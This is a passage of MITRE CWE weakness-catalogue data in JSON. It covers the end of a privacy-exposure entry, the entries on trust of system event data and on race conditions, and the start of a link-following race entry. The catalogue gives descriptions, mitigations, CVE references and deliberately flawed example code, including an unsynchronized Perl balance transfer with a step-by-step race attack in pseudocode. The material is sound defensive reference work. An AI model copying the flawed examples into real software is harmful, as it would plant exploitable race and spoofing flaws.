Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO13-J","Entry_Name":"Do not log sensitive information outside a trust boundary"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"464"}},{"attr":{"@_CAPEC_ID":"467"}},{"attr":{"@_CAPEC_ID":"508"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-338"}},{"attr":{"@_External_Reference_ID":"REF-339"}},{"attr":{"@_External_Reference_ID":"REF-340"}},{"attr":{"@_External_Reference_ID":"REF-341"}},{"attr":{"@_External_Reference_ID":"REF-342"}},{"attr":{"@_External_Reference_ID":"REF-343"}},{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-172"}},{"attr":{"@_External_Reference_ID":"REF-1047"}},{"attr":{"@_External_Reference_ID":"REF-1048"}}]},"Notes":{"Note":{"#text":"This entry overlaps many other entries that are not organized around the kind of sensitive information that is exposed.  However, because privacy is treated with such importance due to regulations and other factors, and it may be useful for weakness-finding tools to highlight capabilities that detect personal private information instead of system information, it is not clear whether - and how - this entry should be deprecated.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Name, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":[{"#text":"Privacy Violation","attr":{"@_Date":"2014-02-18"}},{"#text":"Exposure of Private Information (\'Privacy Violation\')","attr":{"@_Date":"2020-02-24"}}]}},"360":{"attr":{"@_ID":"360","@_Name":"Trust of System Event Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Security based on event locations are insecure and can be spoofed.","Extended_Description":"Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop can send a message to any window on the same desktop. There is no authentication framework for these messages. Therefore, any message can be used to manipulate any process on the desktop if the process does not check the validity and safeness of those messages.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"If one trusts the system-event information and executes commands based on it, one could potentially take actions based on a spoofed identity."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Never trust or rely any of the information in an Event for security."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example code prints out secret information when an authorized user activates a button:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent e) {}","xhtml:div":{"#text":"if (e.getSource() == button) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"print out secret information\\");","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"This code does not attempt to prevent unauthorized users from activating the button. Even if the button is rendered non-functional to unauthorized users in the application UI, an attacker can easily send a false button press event to the application window and expose the secret information."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trust of system event data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"362":{"attr":{"@_ID":"362","@_Name":"Concurrent Execution using Shared Resource with Improper Synchronization (\'Race Condition\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.","Extended_Description":{"xhtml:p":["This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider.","A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc.","A race condition violates these properties, which are closely related:","A race condition exists when an \\"interfering code sequence\\" can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when they are not, this violates atomicity. For example, the single \\"x++\\" statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x).","The interfering code sequence could be \\"trusted\\" or \\"untrusted.\\" A trusted interfering code sequence occurs within the program; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable program."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution.","Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Java","@_Prevalence":"Sometimes"}}],"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"When a race condition makes it possible to bypass a resource cleanup routine or trigger multiple initialization routines, it may lead to resource exhaustion (CWE-400)."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Instability"],"Note":"When a race condition allows multiple control flows to access a resource simultaneously, it might lead the program(s) into unexpected states, possibly resulting in a crash."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Read Application Data"],"Note":"When a race condition is combined with predictable resource names and loose permissions, it may be possible for an attacker to overwrite or access confidential data (CWE-59)."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"Black box methods may be able to identify evidence of race conditions via methods such as multiple simultaneous connections, which may cause the software to become instable or crash. However, race conditions with very narrow timing windows would not be detectable."},{"Method":"White Box","Description":"Common idioms are detectable in white box analysis, such as time-of-check-time-of-use (TOCTOU) file operations (CWE-367), or double-checked locking (CWE-609)."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Race conditions may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior.","Insert breakpoints or delays in between relevant code statements to artificially expand the race window so that it will be easier to detect."]},"Effectiveness":"Moderate"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Framework-based Fuzzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance."},{"Phase":"Architecture and Design","Description":"Use thread-safe capabilities such as the data access abstraction in Spring."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.","Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400)."]}},{"Phase":"Implementation","Description":"When using multithreading and operating on shared variables, only use thread-safe functions."},{"Phase":"Implementation","Description":"Use atomic operations on shared variables. Be wary of innocent-looking constructs such as \\"x++\\". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write."},{"Phase":"Implementation","Description":"Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412."},{"Phase":"Implementation","Description":"Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization."},{"Phase":"Implementation","Description":"Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop."},{"Phase":"Implementation","Description":"Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$transfer_amount = GetTransferAmount();$balance = GetBalanceFromDatabase();if ($transfer_amount &lt; 0) {}$newbalance = $balance - $transfer_amount;if (($balance - $transfer_amount) &lt; 0) {}SendNewBalanceToDatabase($newbalance);NotifyUser(\\"Transfer of $transfer_amount succeeded.\\");NotifyUser(\\"New balance: $newbalance\\");","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"FatalError(\\"Bad Transfer Amount\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"FatalError(\\"Insufficient Funds\\");","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:div":{"#text":"In the following pseudocode, the attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2.CALLER-1 makes a transfer request of 80.00.PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase().Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay.CALLER-2 makes a transfer request of 1.00.PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet.PROGRAM-2 determines the new balance as 99.00.After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00.PROGRAM-2 sends a request to update the database, setting the balance to 99.00","xhtml:br":["","","","","","","","","",""]}}],"Body_Text":["A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase().","Suppose the balance is initially 100.00. An attack could be constructed as follows:","At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database.","To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase()."]},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-18827","Description":"chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"},{"Reference":"CVE-2014-8273","Description":"Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273"},{"Reference":"CVE-2008-5044","Description":"Race condition leading to a crash by calling a hook removal procedure while other activities are occurring at the same time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5044"},{"Reference":"CVE-2008-2958","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958"},{"Reference":"CVE-2008-1570","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570"},{"Reference":"CVE-2008-0058","Description":"Unsynchronized caching operation enables a race condition that causes messages to be sent to a deallocated object.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0058"},{"Reference":"CVE-2008-0379","Description":"Race condition during initialization triggers a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0379"},{"Reference":"CVE-2007-6599","Description":"Daemon crash by quickly performing operations and undoing them, which eventually leads to an operation that does not acquire a lock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6599"},{"Reference":"CVE-2007-6180","Description":"chain: race condition triggers NULL pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6180"},{"Reference":"CVE-2007-5794","Description":"Race condition in library function could cause data to be sent to the wrong process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794"},{"Reference":"CVE-2007-3970","Description":"Race condition in file parser leads to heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3970"},{"Reference":"CVE-2008-5021","Description":"chain: race condition allows attacker to access an object while it is still being initialized, causing software to access uninitialized memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021"},{"Reference":"CVE-2009-4895","Description":"chain: race condition for an argument value, possibly resulting in NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895"},{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Race Conditions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-349"}},{"attr":{"@_External_Reference_ID":"REF-350"}},{"attr":{"@_External_Reference_ID":"REF-351"}},{"attr":{"@_External_Reference_ID":"REF-352"}},{"attr":{"@_External_Reference_ID":"REF-353"}},{"attr":{"@_External_Reference_ID":"REF-354"}},{"attr":{"@_External_Reference_ID":"REF-355"}},{"attr":{"@_External_Reference_ID":"REF-356"}},{"attr":{"@_External_Reference_ID":"REF-357"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-1237"}}]},"Notes":{"Note":[{"#text":"The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention.","attr":{"@_Type":"Maintenance"}},{"#text":"Race conditions in web applications are under-studied and probably under-reported. However, in 2008 there has been growing interest in this area.","attr":{"@_Type":"Research Gap"}},{"#text":"Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check.","attr":{"@_Type":"Research Gap"}},{"#text":"From a classification/taxonomy perspective, the relationships between concurrency and program state need closer investigation and may be useful in organizing related issues.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, References, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example"},"Previous_Entry_Name":[{"#text":"Race Conditions","attr":{"@_Date":"2008-04-11"}},{"#text":"Race Condition","attr":{"@_Date":"2010-12-13"}}]}},"363":{"attr":{"@_ID":"363","@_Name":"Race Condition Enabling Link Following","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, 